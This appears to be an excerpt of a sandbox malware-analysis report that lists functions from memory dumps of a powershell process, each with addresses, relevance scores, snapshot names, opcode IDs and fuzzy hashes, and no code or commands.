                                                                                    • Opcode Fuzzy Hash: 91f07404001c3306810080f6f16b64e7ddb93e210fb2ec0fe5942d15bdc4cf81
                                                                                    • Instruction Fuzzy Hash: EB41CBB4A002059FCB15DF79E494A9EBBF1FF4D304F048969E416AB391DB30AD45CBA1
                                                                                    Function 04A0E640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: JIl
                                                                                    • API String ID: 0-871223391
                                                                                    • Opcode ID: ff5d7d32d6e89b1ce12605c482ed3eaa370bf300365398c8dc1d71a1861c9cda
                                                                                    • Instruction ID: 31eca910f63f256576ffa0dbe6932d517ab9c1c84afb77b18725190f8c3b18eb
                                                                                    • Opcode Fuzzy Hash: ff5d7d32d6e89b1ce12605c482ed3eaa370bf300365398c8dc1d71a1861c9cda
                                                                                    • Instruction Fuzzy Hash: 92314DB4A006059FCB14DF79E594A9EBBF2FF4C304F108929D416AB394DB30AD45CBA1
                                                                                    Function 04A0AF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (&tq
                                                                                    • API String ID: 0-341024711
                                                                                    • Opcode ID: 7e4a77866e9a38c20413d4e0a449b0b214bb189d27ed395f9fa1bfa4dccd30cc
                                                                                    • Instruction ID: 2601295ba73d153e9466dd2b8145961baf879e030690a62c83d392796f757102
                                                                                    • Opcode Fuzzy Hash: 7e4a77866e9a38c20413d4e0a449b0b214bb189d27ed395f9fa1bfa4dccd30cc
                                                                                    • Instruction Fuzzy Hash: 2221B271A043588FDB14DFAEE44079FBBF5EF88320F14842AD419E7340CB75A9058BA5
                                                                                    Function 04A029F0 Relevance: .2, Instructions: 207COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b7793a03154a3503120b0733e0643e3b18135fdc22ff56fcd1995fb1523dc8a
                                                                                    • Instruction ID: 6034d2b7ed0b641cf07ea2149f6ea740cb01a8066db23b6a2138cdc3797acc15
                                                                                    • Opcode Fuzzy Hash: 5b7793a03154a3503120b0733e0643e3b18135fdc22ff56fcd1995fb1523dc8a
                                                                                    • Instruction Fuzzy Hash: 9F917075A00609CFCB15CF99C498AAEFBB1FF48310B248599D915AB3A5C735FC51CBA0
                                                                                    Function 04A07740 Relevance: .2, Instructions: 156COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 38bbb8008a16259cef204ca213204137508e043e1aea558aaae73e6df7d42826
                                                                                    • Instruction ID: c906604c2d4cdcbb36521fb54b02bacf0c6a9ea73d1457ea3d1817c7c7cc9fe5
                                                                                    • Opcode Fuzzy Hash: 38bbb8008a16259cef204ca213204137508e043e1aea558aaae73e6df7d42826
                                                                                    • Instruction Fuzzy Hash: A251C1383042159FD714DB79E854A2A7BEAFFC9350B148469E509CB391EB31FC42CBA0
                                                                                    Function 04A0BAC0 Relevance: .2, Instructions: 155COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dd62e7b2c30658b02cf74c9502591c7e5669c80b5deed049210617648462c39f
                                                                                    • Instruction ID: 4278c81daf9cdbd652db9d7d48fbb5469a07b0f0dc41cd258f635091720e2236
                                                                                    • Opcode Fuzzy Hash: dd62e7b2c30658b02cf74c9502591c7e5669c80b5deed049210617648462c39f
                                                                                    • Instruction Fuzzy Hash: AE61F8B5E002489FDB14DFA9D584A9DFBF1EF88310F15C12AE819AB354EB34AD45CB60
                                                                                    Function 04A0BAB0 Relevance: .2, Instructions: 152COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6b6b0c8a9a11f916834c5371199ffd0e8b45cd1d6630c39d16605df62feb9df4
                                                                                    • Instruction ID: 8c2979dfc6b30dad657146f706f05ab8b2266ef801494c96f076b7b5db49ef70
                                                                                    • Opcode Fuzzy Hash: 6b6b0c8a9a11f916834c5371199ffd0e8b45cd1d6630c39d16605df62feb9df4
                                                                                    • Instruction Fuzzy Hash: 3F51F775E002489FCB14DFA9D584A9DFBF1EF88310F18C169E819EB254EB34A945CB61
                                                                                    Function 04A0E419 Relevance: .1, Instructions: 140COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7dcf7d8a7e28b46a8bc821b0d86154548d692a75a3636dc48bd3e8f47ec1160f
                                                                                    • Instruction ID: 26ee4354b5668aa394bcc90c091f063b0e14fa5095b53534056d8195fb975de8
                                                                                    • Opcode Fuzzy Hash: 7dcf7d8a7e28b46a8bc821b0d86154548d692a75a3636dc48bd3e8f47ec1160f
                                                                                    • Instruction Fuzzy Hash: 1A516BB47002098FDB10DF6CD49496EBBE6EF89354B14C869E459CF3A6EB31EC058B91
                                                                                    Function 04A0E428 Relevance: .1, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cbe330016478d1a0af14fa58abe3729a62f2ea17b2b7e2b6404c55083985a9b6
                                                                                    • Instruction ID: d45b161b6182eff9f478fb4f6b9b2555e064a175338f348868f636d509927320
                                                                                    • Opcode Fuzzy Hash: cbe330016478d1a0af14fa58abe3729a62f2ea17b2b7e2b6404c55083985a9b6
                                                                                    • Instruction Fuzzy Hash: B74118B47002098FDB10DF6DD59492ABBE6EF8D354B14C868E459CF395EB31EC058B91
                                                                                    Function 077E3D9D Relevance: .1, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 25f6eb05edcecf7bfc0f08d83c6e9ae1dd722c08a73c5da6864c8743db45e796
                                                                                    • Instruction ID: 1fe8f77570d08c84860e3ec14f816a08ad859c9f4d612c9b39f5fde7922e1281
                                                                                    • Opcode Fuzzy Hash: 25f6eb05edcecf7bfc0f08d83c6e9ae1dd722c08a73c5da6864c8743db45e796
                                                                                    • Instruction Fuzzy Hash: A43148F1B001519BCB2197788811EBBBBA79FC9394F1484AAD602AF355DA35DD02C7A2
                                                                                    Function 04A06FB0 Relevance: .1, Instructions: 112COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d948b204c1543c83c1bfaafa8c815c79da224dada0575391ffbb47bf0d00b521
                                                                                    • Instruction ID: 280d4847866cadb616cfdca6e0f87df278b6906e7e0efa8c35b358d4d6e7c7ff
                                                                                    • Opcode Fuzzy Hash: d948b204c1543c83c1bfaafa8c815c79da224dada0575391ffbb47bf0d00b521
                                                                                    • Instruction Fuzzy Hash: 2E4180387042548FDB05CFA8D498AAEBFF1AF8E314F1480A9D445AB396CB31EC41CB61
                                                                                    Function 04A02B00 Relevance: .1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4e763d96544a849b0d53e4425ed17b52af20ddd9da7e5e389400db2d6861b78b
                                                                                    • Instruction ID: d56f8ea4bef48d778e9e1979df52ee4ce1847346b7737e88a52319cfb5081db8
                                                                                    • Opcode Fuzzy Hash: 4e763d96544a849b0d53e4425ed17b52af20ddd9da7e5e389400db2d6861b78b
                                                                                    • Instruction Fuzzy Hash: DF414BB5A006058FCB05CF59C498AAEFBB1FF48310B158599D815AB3A4C732FC91CFA0
                                                                                    Function 04A0C388 Relevance: .1, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6e8c1e3bc412c054f501fde01bb0d22134791dc6d0517cac4e6b294d29e4c47b
                                                                                    • Instruction ID: cb8ee981e30064f9d27388a3f9d5c17df4eefe816fea4fde428eef7b09e91bbc
                                                                                    • Opcode Fuzzy Hash: 6e8c1e3bc412c054f501fde01bb0d22134791dc6d0517cac4e6b294d29e4c47b
                                                                                    • Instruction Fuzzy Hash: E6318D753007019FC709DB79E854BAEB792EBC8354F048A29E50ACB394EB71A855CB92
                                                                                    Function 04A0AE60 Relevance: .1, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0651caeab18919f8e4a576bdca9096ecb3c70d50bce8878181e2875a2f746123
                                                                                    • Instruction ID: c8cd98ab8877ea120e9bbb7ba5c946f140900ec1d96c9f273e8eec0618e062c3
                                                                                    • Opcode Fuzzy Hash: 0651caeab18919f8e4a576bdca9096ecb3c70d50bce8878181e2875a2f746123
                                                                                    • Instruction Fuzzy Hash: 353160B0A003099BDB04DFB9D5946AEBBF6AF99350F14C029E415EB394EB34AC418B91
                                                                                    Function 04A0DFC0 Relevance: .1, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bfbbb1b9a2fac5dbe356d62c2ff6ce9d168d2499947d0e261ef8fbcd84b33cd4
                                                                                    • Instruction ID: adba33d0c6f32d395064eca718bf341a5243b62028f01b2b078726b3a246d07c
                                                                                    • Opcode Fuzzy Hash: bfbbb1b9a2fac5dbe356d62c2ff6ce9d168d2499947d0e261ef8fbcd84b33cd4
                                                                                    • Instruction Fuzzy Hash: B8313E75A006048FDB14DFA9E454A9EBBF2EF8D314F148569D406EB390DF75AC81CB90
                                                                                    Function 04A0AD28 Relevance: .1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 761b49513a4e7c96f6d6aedf5a3a4f7d70778c84d8522592f7b10edb1066f5f7
                                                                                    • Instruction ID: b827c4c72795c0e095aa0ba9de518f1aecee12b199acfa5f95aefbbb1d6ccf4c
                                                                                    • Opcode Fuzzy Hash: 761b49513a4e7c96f6d6aedf5a3a4f7d70778c84d8522592f7b10edb1066f5f7
                                                                                    • Instruction Fuzzy Hash: 433186B8E003059FDB04DBB4D454AAEBBB6EF88300F15C469D524AF3A5DB74AD018F61
                                                                                    Function 04A0AE70 Relevance: .1, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c0f4ef0e08e0f04083d2a848814d10dac6b6ec3f851848edf335e4266989a3b1
                                                                                    • Instruction ID: 1a8c40fc36986f846314c01e69ed3ed45e5901e1afaf6afbd77dc3ab8cc5aa09
                                                                                    • Opcode Fuzzy Hash: c0f4ef0e08e0f04083d2a848814d10dac6b6ec3f851848edf335e4266989a3b1
                                                                                    • Instruction Fuzzy Hash: F8313EB0A003099FDB04DFA9D5947AEBBF6AF88350F14C029E405EB394EB749C418F51
                                                                                    Function 04A093F0 Relevance: .1, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9120f5d19b9107f5b467b71afe8f43a8d3fc10aa15a788c7d01e20bb9834058f
                                                                                    • Instruction ID: 825d0e686c5d43eb5da8246f2444d33c7ed2e7cd446cdea97e2b5aa70b0ed7c7
                                                                                    • Opcode Fuzzy Hash: 9120f5d19b9107f5b467b71afe8f43a8d3fc10aa15a788c7d01e20bb9834058f
                                                                                    • Instruction Fuzzy Hash: 9E319AB59017449FDB60CF6AD0883CBFBF6EF88320F28C41AD45D97295D775A4818B61
                                                                                    Function 04A0AD38 Relevance: .1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf3671e3bdc12c0b12164077ebd9f984df2f4d87dbb856001bca71c719d74314
                                                                                    • Instruction ID: 2007602e02c554b59dc422f1db21e17d6e9b6ebfc366505791a216e8a6ce1175
                                                                                    • Opcode Fuzzy Hash: cf3671e3bdc12c0b12164077ebd9f984df2f4d87dbb856001bca71c719d74314
                                                                                    • Instruction Fuzzy Hash: FC3132B8E002099FDB04DFA4D454AAEB7B6EFC8300F11C469D525AF3A4DB35AD118F51
                                                                                    Function 04A0DFD0 Relevance: .1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f384edcd008143fad00e63c9e974882080d497e3b08f35589a31f6278d29a2d
                                                                                    • Instruction ID: 2db85d0e9f5f2fe383de44d00e7af289a46dc35668ffe6428a8c47dd1b484290
                                                                                    • Opcode Fuzzy Hash: 2f384edcd008143fad00e63c9e974882080d497e3b08f35589a31f6278d29a2d
                                                                                    • Instruction Fuzzy Hash: DB311C74A006048FCB14DF69E458A9EBBF2AF8D314F148569D406EB3A4DF75AC85CB90
                                                                                    Function 0316F3D8 Relevance: .1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703694674.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_316d000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e7ba64e240640398f29518c2b0bfcc802fc6c17493a68eb020837bad1ad42e5b
                                                                                    • Instruction ID: d91f492ac1a04f77142c72e3bdd2b4277b27959a21f138184f79f64163ca43a5
                                                                                    • Opcode Fuzzy Hash: e7ba64e240640398f29518c2b0bfcc802fc6c17493a68eb020837bad1ad42e5b
                                                                                    • Instruction Fuzzy Hash: 3B21F476508200EFCB05CF94E9C0B26BBA5FB8C314F24C5ADE9094B656C736D467CBA1
                                                                                    Function 0316F02C Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703694674.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_316d000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f5ec657c39e2a4eb95dbef7810beab55a9200f6ce4fb6a6e012bc25057f1bf37
                                                                                    • Instruction ID: ea56b6961227ee15aa4a552283cca163d2b10dcca37aebd62fb4530e2cad78c5
                                                                                    • Opcode Fuzzy Hash: f5ec657c39e2a4eb95dbef7810beab55a9200f6ce4fb6a6e012bc25057f1bf37
                                                                                    • Instruction Fuzzy Hash: 94213771504640DFCB14CF54E9C0B26BBA6FB8C314F24C5ADD9094B246C336D457CA61
                                                                                    Function 04A09400 Relevance: .1, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9586e35c9050be747455f873f3292cc3343262d3c7a4884fa03ea572324c0914
                                                                                    • Instruction ID: e330e2e23712a58ec3616138978e82cfe2c850b8bc8abf4d908fc6666a50d35d
                                                                                    • Opcode Fuzzy Hash: 9586e35c9050be747455f873f3292cc3343262d3c7a4884fa03ea572324c0914
                                                                                    • Instruction Fuzzy Hash: F7218DB09057448EDB60CF6AD48838AFBF6EF88310F28C41AD45D97285D77464458B51
                                                                                    Function 04A0767C Relevance: .1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5fdfe06660820c5a131ceb040d6256d4a83c54b693108c349763bac7ba3ec99f
                                                                                    • Instruction ID: 734f83b1da78365721e46d19f492290ae588cde74071733946ebf2f78556e122
                                                                                    • Opcode Fuzzy Hash: 5fdfe06660820c5a131ceb040d6256d4a83c54b693108c349763bac7ba3ec99f
                                                                                    • Instruction Fuzzy Hash: D911E97A7001288FCB04DBA9E844AED77F6EBCC355B0480A5E509DB354DB35ED158BA0
                                                                                    Function 04A0DCD9 Relevance: .1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8640871ce93db38a14e9268d96a20fb703db6f27e27e436a08ae2a6eeae4dc60
                                                                                    • Instruction ID: 314b8874072de4944f673adb63bbb38300e394698a1259d66314534ce50af128
                                                                                    • Opcode Fuzzy Hash: 8640871ce93db38a14e9268d96a20fb703db6f27e27e436a08ae2a6eeae4dc60
                                                                                    • Instruction Fuzzy Hash: 46112937B045489FCF158BB4F4184FDBBB6EB89360B18C86AD406DB295EA316C51CBE0
                                                                                    Function 0316F3D3 Relevance: .1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703694674.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_316d000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0c837a722a62dca897b8353bef7eb572a5012b0ea2a20885a79e8488b46da780
                                                                                    • Instruction ID: 23973d88557fa300ebfda7da75b847825521297fa7bdbb370bdf6fae621d4245
                                                                                    • Opcode Fuzzy Hash: 0c837a722a62dca897b8353bef7eb572a5012b0ea2a20885a79e8488b46da780
                                                                                    • Instruction Fuzzy Hash: D121CD76504240DFCF06CF50D9C0B16BF72FB88314F28C6A9D9094B656C33AD46ACB91
                                                                                    Function 04A0C343 Relevance: .1, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cff1eda3e29d1cffe35e5b486088c7b1611180747b5577adcdde1a28518bf70e
                                                                                    • Instruction ID: 9493c855659b91316a9300231a79cbc8d2223259ba3f4a2bcdb66a5149146d11
                                                                                    • Opcode Fuzzy Hash: cff1eda3e29d1cffe35e5b486088c7b1611180747b5577adcdde1a28518bf70e
                                                                                    • Instruction Fuzzy Hash: 9811846550E3D14FD31797346874ACA7FB09F47264F0A40EBC488CF1E3D5155809C362
                                                                                    Function 0316F027 Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703694674.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_316d000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2ac0a3de42a390a117873494f9c35952ee21e3dc06d219b249f09dee0e899479
                                                                                    • Instruction ID: 0b0d6b020ba5f38b14f99a34462d48305f16e6aa8486ad1b9691994c28f27842
                                                                                    • Opcode Fuzzy Hash: 2ac0a3de42a390a117873494f9c35952ee21e3dc06d219b249f09dee0e899479
                                                                                    • Instruction Fuzzy Hash: 4311DD76504680CFDB11CF54E5C0B15FFA2FB88324F28C6AAD8094B656C33AD45ACB61
                                                                                    Function 04A0BCE0 Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 46c182fd7e52e04d72827c7753c2e2916b439b74cee87eb4ec2d6e3f3330b347
                                                                                    • Instruction ID: 6c42dc51e02e7d2c15b1b3d8c81b0d1a5aa4b0fc4c72958aba13d70189a571a4
                                                                                    • Opcode Fuzzy Hash: 46c182fd7e52e04d72827c7753c2e2916b439b74cee87eb4ec2d6e3f3330b347
                                                                                    • Instruction Fuzzy Hash: 6A11A5316083445FDB14CB75E59469ABFE1EF45350B1488AAD05AC76B1CA21B845D710
                                                                                    Function 04A0E2A0 Relevance: .0, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 145bb069273a2b09d0916954278c3b3c5af1fd95de84089f0fbcf2abfbb9572c
                                                                                    • Instruction ID: 20f60c2a7a7a7ba01c2af01359e7f1edd3a29993a7e6a2cad855e14818683cf9
                                                                                    • Opcode Fuzzy Hash: 145bb069273a2b09d0916954278c3b3c5af1fd95de84089f0fbcf2abfbb9572c
                                                                                    • Instruction Fuzzy Hash: 37110935204750CFC728DF79D05185ABBF6EF8931532489ADD44A8B7A1DB36F942CB50
                                                                                    Function 04A0DE98 Relevance: .0, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 561e7ae4d4a264e7b9f7d8cb804f6c6eb533dc40d5204066d986297bd53baf6d
                                                                                    • Instruction ID: efc508215fff95c89d9c5f984461b9e2e9c57f34c3f8260d3d7673a0c03e1c3f
                                                                                    • Opcode Fuzzy Hash: 561e7ae4d4a264e7b9f7d8cb804f6c6eb533dc40d5204066d986297bd53baf6d
